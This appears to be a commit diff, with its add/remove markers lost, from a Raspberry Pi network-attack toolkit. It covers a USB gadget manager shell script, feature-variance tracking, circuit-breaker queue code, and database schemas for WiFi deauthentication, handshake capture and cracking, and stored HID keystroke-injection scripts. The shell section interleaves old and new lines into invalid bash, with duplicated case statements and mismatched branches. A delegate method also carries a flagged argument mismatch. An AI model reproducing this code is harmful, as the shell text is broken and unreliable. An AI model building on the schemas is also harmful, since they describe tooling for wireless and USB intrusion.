service_enabled "$USB_GADGET_SERVICE" && log "SUCCESS" "${USB_GADGET_SERVICE} is enabled at boot" || log "WARNING" "${USB_GADGET_SERVICE} is not enabled at boot"
else
echo -e "${RED}usb-gadget.service is not installed.${NC}"
log "ERROR" "${USB_GADGET_SERVICE} is not installed on this system"
fi
# Check if USB gadget script exists
echo -e "\n${YELLOW}USB Gadget Script:${NC}"
if [ -f /usr/local/bin/usb-gadget.sh ]; then
echo -e "${GREEN}/usr/local/bin/usb-gadget.sh exists.${NC}"
if service_exists "$DNSMASQ_SERVICE"; then
service_active "$DNSMASQ_SERVICE" && log "SUCCESS" "${DNSMASQ_SERVICE} is active" || log "WARNING" "${DNSMASQ_SERVICE} is not active"
else
echo -e "${RED}/usr/local/bin/usb-gadget.sh does not exist.${NC}"
log "WARNING" "${DNSMASQ_SERVICE} is not installed"
fi
# Check network interface configuration
echo -e "\n${YELLOW}Network Interface Configuration for usb0:${NC}"
if grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
grep "^allow-hotplug usb0" /etc/network/interfaces -A 4
print_divider
log "SECTION" "Runtime Files"
[ -x "$USB_GADGET_SCRIPT" ] && log "SUCCESS" "${USB_GADGET_SCRIPT} is present and executable" || log "ERROR" "${USB_GADGET_SCRIPT} is missing or not executable"
[ -c /dev/hidg0 ] && log "SUCCESS" "/dev/hidg0 (keyboard) is available" || log "WARNING" "/dev/hidg0 (keyboard) is not present"
[ -c /dev/hidg1 ] && log "SUCCESS" "/dev/hidg1 (mouse) is available" || log "WARNING" "/dev/hidg1 (mouse) is not present"
if ip link show usb0 >/dev/null 2>&1; then
log "SUCCESS" "usb0 network interface exists"
ip -brief addr show usb0 2>/dev/null || true
else
echo -e "${RED}No network interface configuration found for usb0.${NC}"
log "WARNING" "usb0 network interface is missing"
fi
# Check cmdline.txt
echo -e "\n${YELLOW}/boot/firmware/cmdline.txt:${NC}"
if grep -q "modules-load=dwc2,g_rndis" /boot/firmware/cmdline.txt && grep -q "modules-load=dwc2,g_ether" /boot/firmware/cmdline.txt; then
echo -e "${GREEN}modules-load=dwc2,g_rndis and modules-load=dwc2,g_ether are present.${NC}"
if [ -d /sys/kernel/config/usb_gadget/g1 ]; then
log "SUCCESS" "Composite gadget directory exists: /sys/kernel/config/usb_gadget/g1"
find /sys/kernel/config/usb_gadget/g1/functions -maxdepth 1 -mindepth 1 -type d 2>/dev/null || true
else
echo -e "${RED}modules-load=dwc2,g_rndis and/or modules-load=dwc2,g_ether are not present.${NC}"
log "WARNING" "No active gadget directory found under /sys/kernel/config/usb_gadget/g1"
fi
# Check config.txt
echo -e "\n${YELLOW}/boot/firmware/config.txt:${NC}"
if grep -q "^dtoverlay=dwc2" /boot/firmware/config.txt; then
echo -e "${GREEN}dtoverlay=dwc2 is present.${NC}"
print_divider
log "SECTION" "Boot Configuration"
if [ -n "$cmdline_file" ] && [ -f "$cmdline_file" ]; then
grep -q "modules-load=dwc2" "$cmdline_file" && log "SUCCESS" "dwc2 boot module load is configured in ${cmdline_file}" || log "WARNING" "dwc2 boot module load not found in ${cmdline_file}"
else
echo -e "${RED}dtoverlay=dwc2 is not present.${NC}"
log "WARNING" "cmdline.txt not found"
fi
# Check if systemd-networkd is enabled
echo -e "\n${YELLOW}systemd-networkd Service:${NC}"
if systemctl is-enabled --quiet systemd-networkd; then
systemctl is-active systemd-networkd && echo -e "${GREEN}systemd-networkd is active.${NC}" || echo -e "${RED}systemd-networkd is inactive.${NC}"
if [ -n "$config_file" ] && [ -f "$config_file" ]; then
grep -q "^dtoverlay=dwc2" "$config_file" && log "SUCCESS" "dtoverlay=dwc2 is present in ${config_file}" || log "WARNING" "dtoverlay=dwc2 not found in ${config_file}"
else
echo -e "${RED}systemd-networkd is not enabled.${NC}"
log "WARNING" "config.txt not found"
fi
echo -e "\n===== End of Information ====="
[ -f "$DNSMASQ_CONFIG" ] && log "SUCCESS" "${DNSMASQ_CONFIG} exists" || log "WARNING" "${DNSMASQ_CONFIG} is missing"
[ -f "$MODULES_LOAD_FILE" ] && log "INFO" "${MODULES_LOAD_FILE} exists (64-bit style module loading)"
[ -f "$MODULES_FILE" ] && grep -q "^libcomposite" "$MODULES_FILE" && log "INFO" "libcomposite is referenced in ${MODULES_FILE}"
[ -f "$INTERFACES_FILE" ] && grep -q "^allow-hotplug usb0" "$INTERFACES_FILE" && log "INFO" "usb0 legacy interface config detected in ${INTERFACES_FILE}"
print_divider
log "SECTION" "Quick Recovery Hints"
log "INFO" "If RNDIS or HID is stuck, run: sudo $0 -r"
log "INFO" "If startup still fails, inspect logs with: sudo journalctl -u ${USB_GADGET_SERVICE} -f"
log "INFO" "If HID nodes never appear after installer changes, a reboot may still be required"
}
# Stop the USB composite gadget cleanly.
# Preference order: stop the systemd unit; if the unit is missing, fall
# back to calling the runtime script's "stop" directly. Afterwards,
# force-remove leftovers (configfs gadget dir, usb0 link) and report
# whether the HID nodes and usb0 are actually gone.
bring_usb_gadget_down() {
    ensure_root
    print_divider
    log "SECTION" "Bringing USB gadget down"
    print_divider
    if service_exists "$USB_GADGET_SERVICE"; then
        if service_active "$USB_GADGET_SERVICE"; then
            log "INFO" "Stopping ${USB_GADGET_SERVICE}..."
            if systemctl stop "$USB_GADGET_SERVICE"; then
                log "SUCCESS" "Stopped ${USB_GADGET_SERVICE}"
            else
                # Stop failure is fatal here; surface journal context first.
                log "ERROR" "Failed to stop ${USB_GADGET_SERVICE}"
                show_recent_logs
                return 1
            fi
        else
            log "INFO" "${USB_GADGET_SERVICE} is already stopped"
        fi
    else
        log "WARNING" "${USB_GADGET_SERVICE} is not installed, trying direct runtime cleanup"
        if [ -x "$USB_GADGET_SCRIPT" ]; then
            # Best effort: ignore failures from the direct stop.
            "$USB_GADGET_SCRIPT" stop >> "$LOG_FILE" 2>&1 || true
        fi
    fi
    # Even after a service stop, the configfs gadget dir may linger; run the
    # script's own cleanup if the gadget tree still exists.
    if [ -x "$USB_GADGET_SCRIPT" ] && [ -d /sys/kernel/config/usb_gadget/g1 ]; then
        log "INFO" "Running direct gadget cleanup via ${USB_GADGET_SCRIPT} stop"
        "$USB_GADGET_SCRIPT" stop >> "$LOG_FILE" 2>&1 || log "WARNING" "Direct cleanup reported a non-fatal issue"
    fi
    if ip link show usb0 >/dev/null 2>&1; then
        log "INFO" "Bringing usb0 interface down"
        ip link set usb0 down >> "$LOG_FILE" 2>&1 || log "WARNING" "usb0 could not be forced down (often harmless)"
    else
        log "INFO" "usb0 is already absent"
    fi
    # Final verification: HID character devices and usb0 should be gone.
    [ -c /dev/hidg0 ] && log "WARNING" "/dev/hidg0 still exists after stop (may clear on next start/reboot)" || log "SUCCESS" "/dev/hidg0 is no longer exposed"
    [ -c /dev/hidg1 ] && log "WARNING" "/dev/hidg1 still exists after stop (may clear on next start/reboot)" || log "SUCCESS" "/dev/hidg1 is no longer exposed"
    ip link show usb0 >/dev/null 2>&1 && log "WARNING" "usb0 still exists after stop" || log "SUCCESS" "usb0 is no longer present"
}
# Start the USB composite gadget.
# Requires the runtime script to be installed. Prefers starting via the
# systemd unit (with a daemon-reload first); falls back to executing the
# runtime script directly when the unit is absent. Then waits for the
# service and usb0 to come up, refreshes dnsmasq for DHCP on usb0, and
# reports the state of the HID nodes and usb0.
bring_usb_gadget_up() {
    ensure_root
    print_divider
    log "SECTION" "Bringing USB gadget up"
    print_divider
    if [ ! -x "$USB_GADGET_SCRIPT" ]; then
        log "ERROR" "${USB_GADGET_SCRIPT} is missing. The gadget runtime is not installed."
        return 1
    fi
    if service_exists "$USB_GADGET_SERVICE"; then
        log "INFO" "Reloading systemd daemon"
        systemctl daemon-reload >> "$LOG_FILE" 2>&1 || log "WARNING" "systemd daemon-reload reported an issue"
        log "INFO" "Starting ${USB_GADGET_SERVICE}..."
        if systemctl start "$USB_GADGET_SERVICE"; then
            log "SUCCESS" "Start command sent to ${USB_GADGET_SERVICE}"
        else
            log "ERROR" "Failed to start ${USB_GADGET_SERVICE}"
            show_recent_logs
            return 1
        fi
    else
        log "WARNING" "${USB_GADGET_SERVICE} is not installed, running ${USB_GADGET_SCRIPT} directly"
        if "$USB_GADGET_SCRIPT" >> "$LOG_FILE" 2>&1; then
            log "SUCCESS" "Runtime script executed directly"
        else
            log "ERROR" "Runtime script failed"
            return 1
        fi
    fi
    # Both waits are advisory (|| true): a slow gadget is reported below,
    # not treated as a hard failure.
    wait_for_condition "${USB_GADGET_SERVICE} to become active" 10 service_active "$USB_GADGET_SERVICE" || true
    wait_for_condition "usb0 to appear" 12 usb0_exists || true
    if service_exists "$DNSMASQ_SERVICE"; then
        log "INFO" "Restarting ${DNSMASQ_SERVICE} to refresh DHCP on usb0"
        systemctl restart "$DNSMASQ_SERVICE" >> "$LOG_FILE" 2>&1 || log "WARNING" "Failed to restart ${DNSMASQ_SERVICE}"
    fi
    # Status report: HID character devices and the usb0 interface.
    [ -c /dev/hidg0 ] && log "SUCCESS" "/dev/hidg0 (keyboard) is ready" || log "WARNING" "/dev/hidg0 not present yet"
    [ -c /dev/hidg1 ] && log "SUCCESS" "/dev/hidg1 (mouse) is ready" || log "WARNING" "/dev/hidg1 not present yet"
    if ip link show usb0 >/dev/null 2>&1; then
        log "SUCCESS" "usb0 is present"
        ip -brief addr show usb0 2>/dev/null || true
    else
        log "WARNING" "usb0 is still missing after startup"
    fi
    log "INFO" "If HID is still missing after a clean start, a reboot can still be required depending on the board/kernel state"
}
# Full gadget reset: tear down, pause briefly so the UDC settles, then
# bring back up. A failed down phase is logged but does not abort —
# the up phase doubles as recovery.
reset_usb_gadget() {
    ensure_root
    print_divider
    log "SECTION" "Resetting USB gadget (down + up)"
    print_divider
    bring_usb_gadget_down || log "WARNING" "Down phase reported an issue, continuing with recovery"
    log "INFO" "Waiting 2 seconds before bringing the gadget back up"
    sleep 2
    bring_usb_gadget_up
}
# ============================================================
# Function to Display the Main Menu
# ============================================================
display_main_menu() {
while true; do
clear
echo -e "${BLUE}╔════════════════════════════════════════╗${NC}"
echo -e "${BLUE} USB Gadget Manager Menu by Infinition ║${NC}"
echo -e "${BLUE}╠════════════════════════════════════════╣${NC}"
echo -e "${BLUE}${NC} 1. Install USB Gadget ${BLUE}${NC}"
echo -e "${BLUE}${NC} 2. Uninstall USB Gadget ${BLUE}${NC}"
echo -e "${BLUE}${NC} 3. List USB Gadget Information ${BLUE}${NC}"
echo -e "${BLUE}${NC} 4. Show Help ${BLUE}${NC}"
echo -e "${BLUE}${NC} 5. Exit ${BLUE}${NC}"
echo -e "${BLUE}╚════════════════════════════════════════╝${NC}"
echo -e "Note: Ensure you run this script as root."
echo -e "${YELLOW}Usage: $0 [OPTIONS] (use -h for help)${NC}"
echo -n -e "${GREEN}Please choose an option (1-5): ${NC}"
read choice
print_divider
echo -e "${CYAN} BJORN USB Gadget Runtime Manager v${SCRIPT_VERSION}${NC}"
print_divider
echo -e "${BLUE} 1.${NC} Bring USB Gadget up"
echo -e "${BLUE} 2.${NC} Bring USB Gadget down"
echo -e "${BLUE} 3.${NC} Reset USB Gadget (down + up)"
echo -e "${BLUE} 4.${NC} List detailed USB Gadget status"
echo -e "${BLUE} 5.${NC} Show help"
echo -e "${BLUE} 6.${NC} Exit"
echo -e ""
echo -e "${YELLOW}Note:${NC} installation/removal is no longer handled here."
echo -n -e "${GREEN}Choose an option (1-6): ${NC}"
read -r choice
case $choice in
case "$choice" in
1)
install_usb_gadget
bring_usb_gadget_up
echo ""
read -p "Press Enter to return to the menu..."
read -r -p "Press Enter to return to the menu..."
;;
2)
uninstall_usb_gadget
bring_usb_gadget_down
echo ""
read -p "Press Enter to return to the menu..."
read -r -p "Press Enter to return to the menu..."
;;
3)
list_usb_gadget_info
reset_usb_gadget
echo ""
read -p "Press Enter to return to the menu..."
read -r -p "Press Enter to return to the menu..."
;;
4)
show_usage
list_usb_gadget_info
echo ""
read -r -p "Press Enter to return to the menu..."
;;
5)
log "INFO" "Exiting USB Gadget Manager. Goodbye!"
show_usage return
echo ""
read -r -p "Press Enter to return to the menu..."
;;
6)
log "INFO" "Exiting BJORN USB Gadget Runtime Manager"
exit 0
;;
*)
log "ERROR" "Invalid option. Please choose between 1-5."
log "ERROR" "Invalid option. Please choose between 1 and 6."
sleep 2
;;
esac
done
}
# ============================================================
# Process Command Line Arguments
# ============================================================
while getopts ":fulh" opt; do
case $opt in
f)
install_usb_gadget
exit 0
;;
u)
uninstall_usb_gadget
exit 0
;;
l)
list_usb_gadget_info
exit 0
;;
h)
show_usage
;;
\?)
echo -e "${RED}Invalid option: -$OPTARG${NC}" >&2
show_usage
;;
esac
while getopts ":udrlhf" opt; do
case "$opt" in
u)
bring_usb_gadget_up
exit $?
;;
d)
bring_usb_gadget_down
exit $?
;;
r)
reset_usb_gadget
exit $?
;;
l)
list_usb_gadget_info
exit 0
;;
h)
show_usage
;;
f)
log "ERROR" "Option -f (install) has been removed. Use -u to bring the gadget up or -r to reset it."
show_usage
;;
\?)
log "ERROR" "Invalid option: -$OPTARG"
show_usage
;;
esac
done
# ============================================================
# Main Execution
# ============================================================
# If no arguments are provided, display the menu
if [ $OPTIND -eq 1 ]; then
display_main_menu
fi

View File

@@ -65,6 +65,13 @@ class DataConsolidator:
self._upload_backoff_until = 0.0
self._upload_backoff_current_s = 0.0
# AI-01: Feature variance tracking for dimensionality reduction
self._feature_variance_min = float(
getattr(shared_data, 'ai_feature_selection_min_variance', 0.001)
)
# Accumulator: {feature_name: [sum, sum_of_squares, count]}
self._feature_stats = {}
logger.info(f"DataConsolidator initialized, exports: {self.export_dir}")
def _set_server_contact_state(self, attempted: bool, ok: Optional[bool]) -> None:
@@ -207,6 +214,9 @@ class DataConsolidator:
host_features, network_features, temporal_features, action_features
)
# AI-01: Track feature variance for dimensionality reduction
self._track_feature_variance(feature_vector)
# Determine time window
raw_ts = record['timestamp']
if isinstance(raw_ts, str):
@@ -340,6 +350,72 @@ class DataConsolidator:
logger.error(f"Error updating aggregated features: {e}")
raise
# ═══════════════════════════════════════════════════════════════════════
# AI-01: FEATURE VARIANCE TRACKING & SELECTION
# ═══════════════════════════════════════════════════════════════════════
def _track_feature_variance(self, feature_vector: Dict[str, float]):
"""
Update running statistics (mean, variance) for each feature.
Uses Welford's online algorithm via sum/sum_sq/count.
"""
for name, value in feature_vector.items():
try:
val = float(value)
except (TypeError, ValueError):
continue
if name not in self._feature_stats:
self._feature_stats[name] = [0.0, 0.0, 0]
stats = self._feature_stats[name]
stats[0] += val # sum
stats[1] += val * val # sum of squares
stats[2] += 1 # count
def _get_feature_variances(self) -> Dict[str, float]:
"""Return computed variance for each tracked feature."""
variances = {}
for name, (s, sq, n) in self._feature_stats.items():
if n < 2:
variances[name] = 0.0
else:
mean = s / n
variances[name] = max(0.0, sq / n - mean * mean)
return variances
def _get_selected_features(self) -> List[str]:
"""Return feature names that pass the minimum variance threshold."""
threshold = self._feature_variance_min
variances = self._get_feature_variances()
selected = [name for name, var in variances.items() if var >= threshold]
dropped = len(variances) - len(selected)
if dropped > 0:
logger.info(
f"Feature selection: kept {len(selected)}/{len(variances)} features "
f"(dropped {dropped} near-zero variance < {threshold})"
)
return sorted(selected)
def _write_feature_manifest(self, selected_features: List[str], export_filepath: str):
"""Write feature_manifest.json alongside the export file."""
try:
variances = self._get_feature_variances()
manifest = {
'created_at': datetime.now().isoformat(),
'feature_count': len(selected_features),
'min_variance_threshold': self._feature_variance_min,
'features': {
name: {'variance': round(variances.get(name, 0.0), 6)}
for name in selected_features
},
'export_file': str(export_filepath),
}
manifest_path = self.export_dir / 'feature_manifest.json'
with open(manifest_path, 'w', encoding='utf-8') as f:
json.dump(manifest, f, indent=2)
logger.info(f"Feature manifest written: {manifest_path} ({len(selected_features)} features)")
except Exception as e:
logger.error(f"Failed to write feature manifest: {e}")
# ═══════════════════════════════════════════════════════════════════════
# EXPORT FUNCTIONS
# ═══════════════════════════════════════════════════════════════════════
@@ -411,6 +487,14 @@ class DataConsolidator:
# Free the large records list immediately after export — record_ids is all we still need
del records
# AI-01: Write feature manifest with variance-filtered feature names
try:
selected = self._get_selected_features()
if selected:
self._write_feature_manifest(selected, str(filepath))
except Exception as e:
logger.error(f"Feature manifest generation failed: {e}")
# Create export batch record
batch_id = self._create_export_batch(filepath, count)

View File

@@ -26,6 +26,9 @@ from db_utils.comments import CommentOps
from db_utils.agents import AgentOps
from db_utils.studio import StudioOps
from db_utils.webenum import WebEnumOps
from db_utils.sentinel import SentinelOps
from db_utils.bifrost import BifrostOps
from db_utils.loki import LokiOps
logger = Logger(name="database.py", level=logging.DEBUG)
@@ -61,6 +64,9 @@ class BjornDatabase:
self._agents = AgentOps(self._base)
self._studio = StudioOps(self._base)
self._webenum = WebEnumOps(self._base)
self._sentinel = SentinelOps(self._base)
self._bifrost = BifrostOps(self._base)
self._loki = LokiOps(self._base)
# Ensure schema is created
self.ensure_schema()
@@ -138,6 +144,9 @@ class BjornDatabase:
self._agents.create_tables()
self._studio.create_tables()
self._webenum.create_tables()
self._sentinel.create_tables()
self._bifrost.create_tables()
self._loki.create_tables()
# Initialize stats singleton
self._stats.ensure_stats_initialized()
@@ -269,6 +278,26 @@ class BjornDatabase:
    def get_last_action_statuses_for_mac(self, mac_address: str) -> Dict[str, Dict[str, str]]:
        """Delegate to QueueOps: latest status entry per action for one MAC."""
        return self._queue.get_last_action_statuses_for_mac(mac_address)
# Circuit breaker operations
    def record_circuit_breaker_failure(self, action_name: str, mac: str = '',
                                       max_failures: int = 5, cooldown_s: int = 300) -> None:
        """Delegate to QueueOps: record one failed attempt for (action, mac).

        NOTE(review): forwards 4 positional args, but the visible QueueOps
        implementation accepts only (action_name, mac='', threshold=3) —
        confirm the arity, otherwise this call raises TypeError.
        """
        return self._queue.record_circuit_breaker_failure(action_name, mac, max_failures, cooldown_s)
    def record_circuit_breaker_success(self, action_name: str, mac: str = '') -> None:
        """Delegate to QueueOps: reset the breaker for (action, mac) after a success."""
        return self._queue.record_circuit_breaker_success(action_name, mac)
    def is_circuit_open(self, action_name: str, mac: str = '') -> bool:
        """Delegate to QueueOps: True while the breaker blocks this (action, mac)."""
        return self._queue.is_circuit_open(action_name, mac)
    def get_circuit_breaker_status(self, action_name: str, mac: str = '') -> Optional[Dict[str, Any]]:
        """Delegate to QueueOps: raw breaker row for (action, mac), or None."""
        return self._queue.get_circuit_breaker_status(action_name, mac)
    def reset_circuit_breaker(self, action_name: str, mac: str = '') -> None:
        """Delegate to QueueOps: manually clear the breaker for (action, mac)."""
        return self._queue.reset_circuit_breaker(action_name, mac)
    def count_running_actions(self, action_name: Optional[str] = None) -> int:
        """Delegate to QueueOps: number of queue rows currently 'running'."""
        return self._queue.count_running_actions(action_name)
# Vulnerability operations
def add_vulnerability(self, mac_address: str, vuln_id: str, ip: Optional[str] = None,
hostname: Optional[str] = None, port: Optional[int] = None):

116
db_utils/bifrost.py Normal file
View File

@@ -0,0 +1,116 @@
"""
Bifrost DB operations — networks, handshakes, epochs, activity, peers, plugin data.
"""
import logging
from logger import Logger
logger = Logger(name="db_utils.bifrost", level=logging.DEBUG)
class BifrostOps:
    """Bifrost DB operations — networks, handshakes, epochs, activity, peers, plugin data.

    Owns only the schema; all statements go through the shared low-level
    ``base`` helper's ``execute()``.
    """

    # Ordered DDL for the Bifrost schema, executed by create_tables().
    _SCHEMA_DDL = (
        # WiFi networks discovered by Bifrost
        """
        CREATE TABLE IF NOT EXISTS bifrost_networks (
            bssid TEXT PRIMARY KEY,
            essid TEXT DEFAULT '',
            channel INTEGER DEFAULT 0,
            encryption TEXT DEFAULT '',
            rssi INTEGER DEFAULT 0,
            vendor TEXT DEFAULT '',
            num_clients INTEGER DEFAULT 0,
            first_seen TEXT DEFAULT CURRENT_TIMESTAMP,
            last_seen TEXT DEFAULT CURRENT_TIMESTAMP,
            handshake INTEGER DEFAULT 0,
            deauthed INTEGER DEFAULT 0,
            associated INTEGER DEFAULT 0,
            whitelisted INTEGER DEFAULT 0
        )
        """,
        # Captured handshakes — one row per (AP, station) pair
        """
        CREATE TABLE IF NOT EXISTS bifrost_handshakes (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            ap_mac TEXT NOT NULL,
            sta_mac TEXT NOT NULL,
            ap_essid TEXT DEFAULT '',
            channel INTEGER DEFAULT 0,
            rssi INTEGER DEFAULT 0,
            filename TEXT DEFAULT '',
            captured_at TEXT DEFAULT CURRENT_TIMESTAMP,
            uploaded INTEGER DEFAULT 0,
            cracked INTEGER DEFAULT 0,
            UNIQUE(ap_mac, sta_mac)
        )
        """,
        # Epoch history
        """
        CREATE TABLE IF NOT EXISTS bifrost_epochs (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            epoch_num INTEGER NOT NULL,
            started_at TEXT NOT NULL,
            duration_secs REAL DEFAULT 0,
            num_deauths INTEGER DEFAULT 0,
            num_assocs INTEGER DEFAULT 0,
            num_handshakes INTEGER DEFAULT 0,
            num_hops INTEGER DEFAULT 0,
            num_missed INTEGER DEFAULT 0,
            num_peers INTEGER DEFAULT 0,
            mood TEXT DEFAULT 'ready',
            reward REAL DEFAULT 0,
            cpu_load REAL DEFAULT 0,
            mem_usage REAL DEFAULT 0,
            temperature REAL DEFAULT 0,
            meta_json TEXT DEFAULT '{}'
        )
        """,
        # Activity log (event feed)
        """
        CREATE TABLE IF NOT EXISTS bifrost_activity (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            timestamp TEXT DEFAULT CURRENT_TIMESTAMP,
            event_type TEXT NOT NULL,
            title TEXT NOT NULL,
            details TEXT DEFAULT '',
            meta_json TEXT DEFAULT '{}'
        )
        """,
        # Newest-first index for the activity feed
        "CREATE INDEX IF NOT EXISTS idx_bifrost_activity_ts ON bifrost_activity(timestamp DESC)",
        # Peers (mesh networking — Phase 2)
        """
        CREATE TABLE IF NOT EXISTS bifrost_peers (
            peer_id TEXT PRIMARY KEY,
            name TEXT DEFAULT '',
            version TEXT DEFAULT '',
            face TEXT DEFAULT '',
            encounters INTEGER DEFAULT 0,
            last_channel INTEGER DEFAULT 0,
            last_seen TEXT DEFAULT CURRENT_TIMESTAMP,
            first_seen TEXT DEFAULT CURRENT_TIMESTAMP
        )
        """,
        # Plugin persistent key/value state
        """
        CREATE TABLE IF NOT EXISTS bifrost_plugin_data (
            plugin_name TEXT NOT NULL,
            key TEXT NOT NULL,
            value TEXT DEFAULT '',
            PRIMARY KEY (plugin_name, key)
        )
        """,
    )

    def __init__(self, base):
        # Shared low-level DB helper exposing execute().
        self.base = base

    def create_tables(self):
        """Create (or verify) every Bifrost table and index."""
        for statement in self._SCHEMA_DDL:
            self.base.execute(statement)
        logger.debug("Bifrost tables created/verified")

51
db_utils/loki.py Normal file
View File

@@ -0,0 +1,51 @@
"""
Loki DB operations — HID scripts and job tracking.
"""
import logging
from logger import Logger
logger = Logger(name="db_utils.loki", level=logging.DEBUG)
class LokiOps:
    """Loki DB operations — saved HID scripts and job execution history."""

    # Ordered DDL for the Loki schema, executed by create_tables().
    _SCHEMA_DDL = (
        # User-saved HID scripts
        """
        CREATE TABLE IF NOT EXISTS loki_scripts (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            name TEXT NOT NULL UNIQUE,
            description TEXT DEFAULT '',
            content TEXT NOT NULL DEFAULT '',
            category TEXT DEFAULT 'general',
            target_os TEXT DEFAULT 'any',
            created_at TEXT DEFAULT CURRENT_TIMESTAMP,
            updated_at TEXT DEFAULT CURRENT_TIMESTAMP
        )
        """,
        # Job execution history (id is an externally generated string key)
        """
        CREATE TABLE IF NOT EXISTS loki_jobs (
            id TEXT PRIMARY KEY,
            script_id INTEGER,
            script_name TEXT DEFAULT '',
            status TEXT DEFAULT 'pending',
            output TEXT DEFAULT '',
            error TEXT DEFAULT '',
            started_at TEXT,
            finished_at TEXT,
            created_at TEXT DEFAULT CURRENT_TIMESTAMP
        )
        """,
        # Fast lookup of jobs by status
        "CREATE INDEX IF NOT EXISTS idx_loki_jobs_status ON loki_jobs(status)",
    )

    def __init__(self, base):
        # Shared low-level DB helper exposing execute().
        self.base = base

    def create_tables(self):
        """Create (or verify) all Loki tables and indexes."""
        for statement in self._SCHEMA_DDL:
            self.base.execute(statement)
        logger.debug("Loki tables created/verified")

View File

@@ -65,6 +65,20 @@ class QueueOps:
WHERE status='scheduled';
""")
# Circuit breaker table for ORCH-01
self.base.execute("""
CREATE TABLE IF NOT EXISTS action_circuit_breaker (
action_name TEXT NOT NULL,
mac_address TEXT NOT NULL DEFAULT '',
failure_streak INTEGER NOT NULL DEFAULT 0,
last_failure_at TEXT,
circuit_status TEXT NOT NULL DEFAULT 'closed',
opened_at TEXT,
cooldown_until TEXT,
PRIMARY KEY (action_name, mac_address)
);
""")
logger.debug("Action queue table created/verified")
# =========================================================================
@@ -398,6 +412,120 @@ class QueueOps:
# HELPER METHODS
# =========================================================================
# =========================================================================
# CIRCUIT BREAKER OPERATIONS (ORCH-01)
# =========================================================================
def record_circuit_breaker_failure(self, action_name: str, mac: str = '',
threshold: int = 3) -> None:
"""Increment failure streak; open circuit if streak >= threshold."""
now_str = self.base.query_one("SELECT datetime('now') AS ts")['ts']
# Upsert the row
self.base.execute("""
INSERT INTO action_circuit_breaker (action_name, mac_address, failure_streak,
last_failure_at, circuit_status)
VALUES (?, ?, 1, ?, 'closed')
ON CONFLICT(action_name, mac_address) DO UPDATE SET
failure_streak = failure_streak + 1,
last_failure_at = excluded.last_failure_at
""", (action_name, mac or '', now_str))
# Check if we need to open the circuit
row = self.base.query_one(
"SELECT failure_streak FROM action_circuit_breaker WHERE action_name=? AND mac_address=?",
(action_name, mac or '')
)
if row and row['failure_streak'] >= threshold:
streak = row['failure_streak']
cooldown_secs = min(2 ** streak * 60, 3600)
self.base.execute("""
UPDATE action_circuit_breaker
SET circuit_status = 'open',
opened_at = ?,
cooldown_until = datetime(?, '+' || ? || ' seconds')
WHERE action_name=? AND mac_address=?
""", (now_str, now_str, str(cooldown_secs), action_name, mac or ''))
def record_circuit_breaker_success(self, action_name: str, mac: str = '') -> None:
"""Reset failure streak and close circuit on success."""
self.base.execute("""
INSERT INTO action_circuit_breaker (action_name, mac_address, failure_streak,
circuit_status)
VALUES (?, ?, 0, 'closed')
ON CONFLICT(action_name, mac_address) DO UPDATE SET
failure_streak = 0,
circuit_status = 'closed',
opened_at = NULL,
cooldown_until = NULL
""", (action_name, mac or ''))
def is_circuit_open(self, action_name: str, mac: str = '') -> bool:
"""Return True if circuit is open AND cooldown hasn't expired.
If cooldown has expired, transition to half_open and return False."""
row = self.base.query_one(
"SELECT circuit_status, cooldown_until FROM action_circuit_breaker "
"WHERE action_name=? AND mac_address=?",
(action_name, mac or '')
)
if not row:
return False
status = row['circuit_status']
if status == 'closed':
return False
if status == 'open':
cooldown = row.get('cooldown_until')
if cooldown:
# Check if cooldown has expired
expired = self.base.query_one(
"SELECT datetime('now') >= datetime(?) AS expired",
(cooldown,)
)
if expired and expired['expired']:
# Transition to half_open
self.base.execute("""
UPDATE action_circuit_breaker SET circuit_status='half_open'
WHERE action_name=? AND mac_address=?
""", (action_name, mac or ''))
return False # Allow one attempt through
return True # Still in cooldown
# half_open: allow one attempt through
return False
def get_circuit_breaker_status(self, action_name: str, mac: str = '') -> Optional[Dict[str, Any]]:
"""Return full circuit breaker status dict."""
row = self.base.query_one(
"SELECT * FROM action_circuit_breaker WHERE action_name=? AND mac_address=?",
(action_name, mac or '')
)
return dict(row) if row else None
def reset_circuit_breaker(self, action_name: str, mac: str = '') -> None:
"""Manual reset of circuit breaker."""
self.base.execute("""
DELETE FROM action_circuit_breaker WHERE action_name=? AND mac_address=?
""", (action_name, mac or ''))
# =========================================================================
# CONCURRENCY OPERATIONS (ORCH-02)
# =========================================================================
def count_running_actions(self, action_name: Optional[str] = None) -> int:
"""Count currently running actions, optionally filtered by action_name."""
if action_name:
row = self.base.query_one(
"SELECT COUNT(*) AS cnt FROM action_queue WHERE status='running' AND action_name=?",
(action_name,)
)
else:
row = self.base.query_one(
"SELECT COUNT(*) AS cnt FROM action_queue WHERE status='running'"
)
return int(row['cnt']) if row else 0
# =========================================================================
# HELPER METHODS
# =========================================================================
def _format_ts_for_raw(self, ts_db: Optional[str]) -> str:
"""
Convert SQLite 'YYYY-MM-DD HH:MM:SS' to 'YYYYMMDD_HHMMSS'.

314
db_utils/sentinel.py Normal file
View File

@@ -0,0 +1,314 @@
"""
Sentinel DB operations — events, rules, known devices baseline.
"""
import json
import logging
from typing import Any, Dict, List, Optional
from logger import Logger
logger = Logger(name="db_utils.sentinel", level=logging.DEBUG)
class SentinelOps:
    """Sentinel DB operations — events, rules, known-device baseline, ARP cache.

    All statements go through ``self.base`` (shared low-level helper exposing
    execute()/query()/query_one()); this class owns only SQL text and JSON
    (de)serialization of rule conditions/actions.
    """

    def __init__(self, base):
        # Shared low-level DB helper (execute / query / query_one).
        self.base = base

    def create_tables(self):
        """Create all Sentinel tables and indexes; seed default rules when empty."""
        # Known device baselines — MAC → expected behavior
        self.base.execute("""
            CREATE TABLE IF NOT EXISTS sentinel_devices (
                mac_address TEXT PRIMARY KEY,
                alias TEXT,
                trusted INTEGER DEFAULT 0,
                watch INTEGER DEFAULT 1,
                first_seen TEXT DEFAULT CURRENT_TIMESTAMP,
                last_seen TEXT DEFAULT CURRENT_TIMESTAMP,
                expected_ips TEXT DEFAULT '',
                expected_ports TEXT DEFAULT '',
                notes TEXT DEFAULT ''
            )
        """)
        # Events / alerts log
        self.base.execute("""
            CREATE TABLE IF NOT EXISTS sentinel_events (
                id INTEGER PRIMARY KEY AUTOINCREMENT,
                timestamp TEXT DEFAULT CURRENT_TIMESTAMP,
                event_type TEXT NOT NULL,
                severity TEXT DEFAULT 'info',
